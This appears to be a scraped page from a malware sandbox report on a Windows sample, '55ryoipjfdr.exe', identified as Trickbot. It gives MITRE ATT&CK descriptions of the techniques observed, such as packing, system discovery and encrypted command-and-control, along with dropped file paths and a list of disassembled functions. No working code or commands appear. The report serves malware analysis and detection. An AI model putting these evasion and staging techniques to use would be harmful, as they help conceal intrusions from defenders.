Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 55ryoipjfdr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Trickbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\winapp\client_id

C:\Users\user\AppData\Roaming\winapp\group_tag

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
55ryoipjfdr.exe

Function 004D007E Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Function 004013B7 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 206
stringsleepprocessCOMMON

Function 00401628 Relevance: 7.6, APIs: 5, Instructions: 71
sleepCOMMON

Function 004D01C0 Relevance: 3.1, APIs: 2, Instructions: 68
memoryCOMMON

Function 004018F4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 004C0000 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 004D05BD Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Function 0040197E Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Function 00401A00 Relevance: 4.8, APIs: 3, Instructions: 315
libraryloaderCOMMON

Function 00402200 Relevance: 3.0, APIs: 2, Instructions: 9
memoryCOMMON

Function 00401DA0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 352
COMMON

Function 004021CF Relevance: 6.0, APIs: 4, Instructions: 18
memoryCOMMON